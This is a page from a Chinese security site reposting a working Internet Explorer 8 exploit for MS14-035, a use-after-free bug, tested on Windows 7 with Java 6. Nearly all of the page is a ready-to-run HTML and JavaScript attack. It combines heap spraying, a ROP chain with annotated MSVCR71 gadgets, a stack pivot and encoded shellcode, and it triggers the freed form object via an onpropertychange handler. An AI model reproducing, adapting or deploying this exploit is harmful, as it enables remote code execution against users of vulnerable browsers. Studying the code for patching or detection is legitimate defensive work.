首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Internet Explorer 8 MS14-035 Use-After-Free Exploit
来源:aymansagy@gmail.com 作者:Sagy 发布时间:2014-11-11  
<!--
Exploit Title: MS14-035 Use-after-free Exploit for IE8
Date: 10 Nov 2014
Exploit Author: Ayman Sagy <aymansagy@gmail.com> https://www.linkedin.com/in/aymansagy
Tested on: IE8 with Java6 on Windows7
-->
  
<html>
<head><title>MS14-035 IE8 Use-after-free Exploit</title></head>
<body>
  
<!--
<APPLET id="dummy" code="dummy.class" width=100 height=100>
You need to install Java to view this page.
</APPLET>
-->
<div id="mydiv">x</div>
   
<form id="frm"></form>
  
<div id="sprayfrm"></div>
   
<script type="text/javascript">
  
spraysize = 5000;
sprayelement = document.getElementById("sprayfrm");
sprayelement.style.cssText = "display:none";
   
var data;
offset = 0x506;
buffer = unescape("%u2020%u2020");
         
          
pivot = unescape("%u8b05%u7c34"); // stack pivot
          
// MSVCR71
rop = unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret;
rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2}
rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect
rop += unescape("%u5645%u7c36"); // pop esi;ret;
rop += unescape("%u5243%u7c34"); // ret;
rop += unescape("%u8f46%u7c34"); // pop ebp;ret;
rop += unescape("%u87ec%u7c34"); // call eax;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ufdff%uffff"); // {size}
rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size}
rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx}
rop += unescape("%u39fa%u7c34"); // pop edx;ret;
rop += unescape("%uffc0%uffff"); // {flag}
rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag}
rop += unescape("%u4648%u7c35"); // pop edi;ret;
rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment}
rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret;
rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret;
rop += unescape("%u683f%u7c36"); // push esp;ret;
rop += unescape("%ubc90%u1010%u1010"); // NOP / MOV ESP,0x10101010
          
// calc
shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u16ba%u3d14%uddf0%ud9c2%u2474%u5ff4%uc929%u32b1%u5731%u0312%u1257%uf983%udfe8%uf905%ua9f9%u01e6%uc9fa%ue46f%udbcb%u6d14%uec79%u235f%u8772%ud732%ue501%ud89a%u40a2%ud7fd%u6533%ubbc1%ue7f0%uc1bd%uc824%u0afc%u0939%u7638%u5bb2%ufd91%u4c61%u4396%u6dba%uc878%u1582%u0efd%uac76%u5efc%ubb27%u46b7%ue343%u7767%uf780%u3e54%uccad%uc12f%u1d67%uf0cf%uf247%u3dee%u0a4a%uf936%u79b5%ufa4c%u7a48%u8197%u0f96%u210a%ub75c%ud0ee%u2eb1%ude64%u247e%uc222%ue981%ufe58%u0c0a%u778f%u2b48%udc0b%u520a%ub80a%u6bfd%u644c%uc9a1%u8606%u68b6%ucc45%uf849%ua9f3%u024a%u99fc%u3322%u7677%ucc34%u3352%u86ca%u15ff%u4f43%u246a%u700e%u6a40%uf337%u1261%uebcc%u1703%uab88%u65f8%u5981%udaff%u4ba2%ubd9c%u1730%u4163"); 
  
/*
       _______0x1cc_____
       |               |
      \|/              |
Junk   ROP Shellcode  Pivot  Junk
        2       3       1
*/  
while (buffer.length < (offset - 0x1cc/2)) buffer += unescape("%u4cc2%u7c34");
  
buffer += rop;
buffer += shellcode;
while (buffer.length < offset) buffer += unescape("%u4cc2%u7c34");
while (buffer.length < 0x1000) buffer += buffer;
  
  
  
data = buffer.substring(0,offset) + pivot + rop + shellcode
data += buffer.substring(0,0x800-offset-rop.length-shellcode.length-pivot.length);
   
while (data.length < 0x80000) data += data;
  
for (var i = 0; i < 0x450; i++) // payload heap spray with corelanc0d3r's DEPS
{
    var obj = document.createElement("button");
    obj.title = data.substring(0,0x40000-0x58);
    //obj.style.fontFamily = data.substring(0,0x40000-0x58);
    sprayelement.appendChild(obj);
}
     
      
block = unescape( // Literal string to avoid heap allocation
            "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
            "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
            "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
            "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
            "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca");
  
  
blocks = new Array();
      
for (i = 0; i < spraysize; i++) {        // spray 1
    blocks.push(document.createElement("button"));
    blocks[i].setAttribute("title",block.substring(0, block.length));
    sprayelement.appendChild(blocks[i]);
}
      
for (i = spraysize/2; i < spraysize; i++) {      // free some blocks
    blocks[i].setAttribute("title","");
}
  
   
   
var newdiv = document.createElement('div');
newdiv.innerHTML = "<textarea id='CTextArea'>&lt;/textarea&gt;";
   
document.getElementById("frm").appendChild(newdiv);
var newdiv2 = document.createElement('div');
newdiv2.innerHTML = "<input id='CInput' type='checkbox' onpropertychange='crash()'></input>";
document.getElementById("frm").appendChild(newdiv2);
   
   
document.getElementById("CInput").checked = true;
  
trigger = true;
  
document.getElementById("frm").reset();
  
   
   
function crash() {
   
    if (trigger) {
    document.getElementById("frm").innerHTML = ""; // Free object, trigger bug
    CollectGarbage();
  
    for (i = spraysize/2; i < spraysize; i++) {      // spray 2
        blocks[i].setAttribute("title",block.substring(0, block.length));
        }
    }
}
  
</script>
   
 </body>
</html>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Visual Mining NetCharts Server
·IP.Board 3.4.7 SQL Injection
·tnftp "savefile" Arbitrary Com
·MS Office 2007 and 2010 - OLE
·ManageEngine Eventlog Analyzer
·Internet Explorer OLE Automati
·PicsArt Photo Studio For Andro
·Internet Explorer OLE Automati
·Belkin n750 jump login Paramet
·MS14-064 Microsoft Windows OLE
·Citrix NetScaler SOAP Handler
·MS14-064 Microsoft Windows OLE
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved